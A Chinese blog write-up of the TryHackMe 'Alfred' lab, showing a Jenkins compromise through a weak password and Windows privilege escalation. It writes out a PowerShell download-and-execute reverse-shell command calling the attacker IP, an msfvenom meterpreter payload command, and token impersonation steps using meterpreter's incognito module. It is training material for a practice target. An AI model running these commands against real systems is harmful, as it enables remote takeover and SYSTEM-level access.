初始打点
80端口没什么东西,8080是jenkins登陆界面,用弱密码admin:admin登进去了是实战中想都不敢想的东西看来一圈,本来想不按照
THM的提示,用manage jenkins中的script console来命令执行。但正常的命令可以做到,下载反弹shell的命令就不行了:
update:之后破案了,靶机没
wget
另一个地方是直接点主页的
project-configure里面的build模块也可以用来命令执行试图简单反弹
shell但是失败了,即使根据报错查到的,加上exit 0也不行
THM这里让使用
Powershell脚本来传nishang的反弹shell:powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.99.99:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.15.168 -Port 1234这里本来想试着直接反弹
msfvenom生成的Powershell脚本,但一直有报错,卡了我一个小时了,包括普通的exe也不行,很奇怪:
于是老老实实慢慢拿shell:
在
/nishang/Shells直接用python -m http.server开服务器在那个
build模块下:powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.99.99:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.99.99 -Port 1234,分别从服务器下载并运行powershell脚本应用一下,然后到主页
build now以启动命令
然后经典在当前用户的桌面找到flag
msf提权用上面的方法传马,并用刚刚连接的命令行来启动。一个比较幽默的点是必须先停止命令行,再下载,再启动命令行再启动木马
生成木马,注意端口号别重复:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.99.99 LPORT=4321 -f exe -o qwq.exe
传马的命令:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.99.99:8000/qwq.exe','qwq.exe')"msf的监听:
命令行那里直接
./qwq启动木马,msf成功上线账户令牌伪造实现Windows提权
这里昨天的
Powerup脚本扫描没有扫到有用的东西Windows 账户令牌:
访问令牌包括:用户SID,组SID,Privileges权限
目前只需要关注账户的权限,以下是容易被滥用的权限,可用的权限可被用于模拟其他用户的令牌:
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilegesedbprivilege相关
SeBackupPrivilegeSeBackupPrivilege服务
SeRestorePrivilege返回特权
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
使用
whoami /priv来查权限是否可用,令人感慨的是meterpreter不支持whoami命令
这里要使用
msf的incognito模块,其专门用于Windows系统的用户令牌窃取:load incognito用
list_tokens -g来查找可用的token,找到了可用的admin
impersonate_token "BUILTIN\Administrators"来伪造该token
getuid能看到这里已经是SYSTEM权限了
但注意,为了保险起见,要把恶意进程迁移至
services.exe中:ps查看当前所有进程,migrate [进程PID]来迁移,没图是因为进程里面没找到service.exe(逃
THM打靶日寄3-Alfred
- 本文链接: http://noone40404.github.io/2024/09/10/THM打靶日寄3:Alfred/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!